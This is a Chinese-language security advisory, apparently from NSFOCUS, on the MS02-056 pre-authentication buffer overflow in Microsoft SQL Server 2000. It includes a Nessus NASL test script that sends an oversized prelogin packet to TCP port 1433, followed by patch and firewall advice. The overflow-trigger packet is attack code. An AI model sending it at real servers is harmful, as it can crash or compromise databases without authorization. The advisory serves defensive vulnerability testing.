首页 -> 安全研究
安全研究
安全漏洞
Microsoft SQL Server预验证过程远程缓冲区溢出漏洞(MS02-056)
发布日期:2002-08-06
更新日期:2002-10-09
受影响系统:
Microsoft SQL Server 2000描述:
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Microsoft SQL Server 2000 SP1
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Microsoft SQL Server 2000 SP2
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
BUGTRAQ ID: 5411
CVE(CAN) ID: CVE-2002-1123
Microsoft SQL Server是一款由Microsoft开发的大型数据库系统。
Microsoft SQL Server在预验证处理时存在漏洞,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。
Microsoft SQL Server的预验证过程存在问题,远程攻击者通过连接TCP 1433端口可以进行缓冲区溢出攻击,由于问题发生在验证之前,所以攻击这无需验证就可以进行攻击,可能使攻击者以SQL进程权限在系统上执行任意指令。
<*来源:Dave Aitel (dave@immunitysec.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=102873609025020&w=2
http://marc.theaimsgroup.com/?l=bugtraq&m=102865925419469&w=2
http://www.microsoft.com/technet/security/bulletin/MS02-056.asp
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
##
#
# this script tests for the "You had me at hello" overflow
# in MSSQL (tcp/1433)
# Copyright Dave Aitel (2002)
# Bug found by: Dave Aitel (2002)
#
##
#TODO:
#techically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!
if(description)
{
script_id(11067);
# script_cve_id("CVE-2000-0402");
script_version ("$Revision: 0.1 $");
name["english"] = "Microsoft SQL Server Hello Overflow";
script_name(english:name["english"]);
desc["english"] = "
The remote MS SQL server is vulnerable to the Hello overflow.
An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.
Solution : disable this service (Microsoft SQL Server).
Risk factor : High";
script_description(english:desc["english"]);
summary["english"] = "Microsoft SQL Server Hello Overflow";
script_summary(english:summary["english"]);
script_category(ACT_ATTACK);
script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel");
family["english"] = "Windows";
script_family(english:family["english"]);
script_require_ports(1433);
exit(0);
}
#
# The script code starts here
#
#taken from mssql.spk
pkt_hdr = raw_string(
0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x15 ,0x00 ,0x06 ,0x01 ,0x00 ,0x1b
,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03 ,0x00 ,0x28 ,0x00 ,0x04 ,0xff ,0x08 ,0x00 ,0x02
,0x10 ,0x00 ,0x00 ,0x00
);
#taken from mssql.spk
pkt_tail = raw_string (
0x00 ,0x24 ,0x01 ,0x00 ,0x00
);
#techically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!
port = 1433;
found = 0;
report = "The SQL Server is vulnerable to the Hello overflow.
An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.
Solution : disable this service (Microsoft SQL Server).
Risk factor : High";
if(get_port_state(port))
{
soc = open_sock_tcp(port);
if(soc)
{
#uncomment this to see what normally happens
#attack_string="MSSQLServer";
#uncomment next line to actually test for overflow
attack_string=crap(560);
# this creates a variable called sql_packet
sql_packet = pkt_hdr+attack_string+pkt_tail;
send(socket:soc, data:sql_packet);
r = recv(socket:soc, length:4096);
close(soc);
display ("Result:",r,"\n");
if(!r)
{
display("Security Hole in MSSQL\n");
security_hole(port:port, data:report);
}
}
}
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在防火墙或者服务器上禁止不可信IP访问SQL Server服务端口
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS02-056)以及相应补丁:
MS02-056:Cumulative Patch for SQL Server (Q316333)
链接:http://www.microsoft.com/technet/security/bulletin/MS02-056.asp
补丁下载:
* Microsoft SQL Server 7.0:
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q327068&sd=tech
* Microsoft SQL Server 2000:
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q316333&sd=tech
浏览次数:31566
严重程度:0(网友投票)
绿盟科技给您安全的保障